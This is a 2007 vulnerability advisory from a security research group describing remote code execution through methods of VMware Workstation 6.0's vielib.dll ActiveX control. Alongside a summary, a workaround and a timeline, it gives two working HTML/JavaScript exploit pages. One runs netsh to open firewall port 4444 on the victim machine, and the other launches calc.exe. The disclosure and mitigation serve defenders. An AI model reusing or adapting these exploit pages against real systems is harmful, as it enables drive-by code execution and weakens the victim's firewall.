:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:
 

vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remote Code Execution
=====================================================================


Internal ID: VULWAR200707295.
-----------


Introduction
------------
vielib.dll is a library included in the Program Vmware Workstation 
Version 6.0.0 from Vmware Inc. Company.
 

Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
 

Summary
-------
The StartProcess, CreateProcess and CreateProcessEx methods don't check
if they are being called from the application or from a malicious user.
A Remote Attacker could craft a html page and execute code in a remote 
system with the privileges of the user that is running the 
affected software. 
 

Impact
------
The vulnerability could allow malicious users to remotely execute code on a 
vulnerable system that uses this software.

 
Workaround
----------
- Activate the Kill bit zero in the clsid corresponding to the software.
- Unregister vielib.dll using regsvr32.
 

Timeline
--------
July 29 2007 -- Bug Discovery.
July 30 2007 -- Exploit published.
 

Credits
-------
 * callAX <callAX@shellcode.com.ar>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
 

Technical Details
-----------------
StartProcess method needs three files (stdin, stdout, stderr) as arguments to 
successfully start a process. The exploit is using three standard files that 
exists in every Microsoft Office 2003 Application.


Exploit (StartProcess Bug)
--------------------------

<HTML>
<BODY>
  <object id=ctrl classid="clsid:{7B9C5422-39AA-4C21-BEEF-645E42EB4529}"></object>
<SCRIPT>

function Poc() {

 All = "C:\\windows\\system32\\netsh.exe"
 people = "C:\\windows\\system32\\netsh.exe firewall add portopening tcp 4444 GotIT"
 seem = "C:\\windows\\system32\\"
 to = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseneu.txt"
 need = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseeng.txt"
 data = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseenu.txt"
 processing = "1"

 ctrl.StartProcess(All ,people ,seem ,to ,need ,data ,processing)

 }

</SCRIPT>
<input language=JavaScript onclick=Poc() type=button value="Proof of Concept">
</BODY>
</HTML>


POC (CreateProcess Bug)
-----------------------

<HTML>
<BODY>
  <object id=_9090909090 classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}"></object>
<SCRIPT>

function _d0_() {
 
 ba="c:\\windows\\system32\\calc.exe"
 ad="c:\\windows\\system32\\calc.exe"
 fO="c:\\windows\\system32\\"
 Od=1

_9090909090.CreateProcess(ba, ad, fO, Od)
 }

</SCRIPT>
<input language=JavaScript onclick=_d0_() type=button value="Proof of Concept">
</BODY>
</HTML>